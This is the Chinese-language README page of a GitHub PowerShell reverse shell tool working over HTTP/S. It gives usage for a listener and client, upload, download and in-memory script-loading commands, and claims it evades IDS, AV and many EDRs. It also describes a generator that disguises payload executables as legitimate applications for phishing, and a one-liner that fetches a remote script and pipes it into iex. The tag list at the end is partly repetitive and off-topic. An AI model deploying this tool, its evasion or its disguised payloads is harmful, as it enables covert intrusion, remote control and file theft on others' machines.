3v4Si0N/HTTP-revshell

GitHub: 3v4Si0N/HTTP-revshell

一款基于 HTTP/S 协议的 PowerShell 反向 Shell 工具,专为红队演练设计,通过伪装 Web 流量建立隐蔽的远程控制通道。

Stars: 603 | Forks: 92

# Powershell HTTP/S 反向 Shell [![Category-tool]]() [![Powershell]]() [![Python]]() [![License]]() HTTP-revshell 是一款专注于红队演练和渗透测试的工具。该工具通过 http/s 协议建立反向连接。它利用隐蔽通道通过 Web 请求获取对目标机器的控制权,从而规避 IDS、IPS 和 AV 等安全检测方案。 **注意:该工具不会在规避技术方面进行维护。只需稍作修改,您即可绕过市场上的许多 EDR。**

HTTP-revshell

## 帮助 server.py 服务端用法: ``` usage: server.py [-h] [--ssl] [--autocomplete] host port positional arguments: host Listen Host port Listen Port optional arguments: -h, --help show this help message and exit --ssl Send traffic over ssl --autocomplete Autocomplete powershell functions ``` ## 帮助 Invoke-WebRev.ps1 (客户端) 客户端用法: ``` Import-Module .\Invoke-WebRev.ps1 Invoke-WebRev -ip IP -port PORT [-ssl] ``` ## 安装 ``` git clone https://github.com/3v4Si0N/HTTP-revshell.git cd HTTP-revshell/ pip3 install -r requirements.txt ``` ## 功能特性 - SSL - 代理感知 (Proxy Aware) - 上传文件 - 下载文件 - 通过服务端加载 PowerShell 脚本 - 错误控制 - ~~AMSI 绕过~~ - PowerShell 函数自动补全(可选) ## 附加功能用法 ### Upload(上传) 此功能允许您将任意文件上传到目标机器。 用法: ``` upload /src/path/file C:\dest\path\file ``` ### Download(下载) 此功能允许您将文件下载到攻击者机器。 用法: ``` download C:\src\path\file /dst/path/file ``` ### Loadps1 此功能允许您加载 PowerShell 脚本而无需写入目标磁盘,通过合法的 HTTP 流量读取文件。 用法: ``` loadps1 /path/to/the/local/server/PowershellScript.ps1 ``` ## 帮助 Revshell-Generator.ps1(自动 Payload 生成器) 此脚本允许您创建一个包含使用 **HTTP-revshell** 所需 Payload 的可执行文件,只需按照屏幕上的说明即可生成。共有 6 个预定义模板和 1 个可自定义模板,可填写您喜欢的数据。 该工具生成的 Payload 包含应用程序的合法图标,以及原始应用程序的产品和版权信息。此外,它们每一个在与服务器建立连接之前都会打开原始应用程序,伪装成合法应用程序。这可用于网络钓鱼或红队演练。 Payload 生成器用法: ``` powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex" ``` ![Revshell-Generator](/images/generator.gif) **重要**:预定义模板中的所有字段均可通过按回车键自动填充。 ## 免责声明与许可 本脚本基于 LGPLv3+ 许可授权。直接链接至 [许可证](https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/LICENSE)。 HTTP-revshell 仅可用于授权的渗透测试和/或非营利性教育目的。 任何滥用本软件的行为均不由作者或任何其他协作者负责。 请仅在自己拥有的服务器上和/或获得服务器所有者许可的情况下使用。
标签:AI合规, AMSI绕过, Conpot, EDR绕过, HTTP/S, IPv6, Libemu, Libemu, Libemu, OpenCanary, PowerShell, Proxy Aware, Python, Windows安全, 内网穿透, 加密通信, 反向Shell, 命令与控制, 威胁检测, 攻击脚本, 文件上传下载, 无后门, 远控, 逆向工具, 隐蔽信道, 高交互蜜罐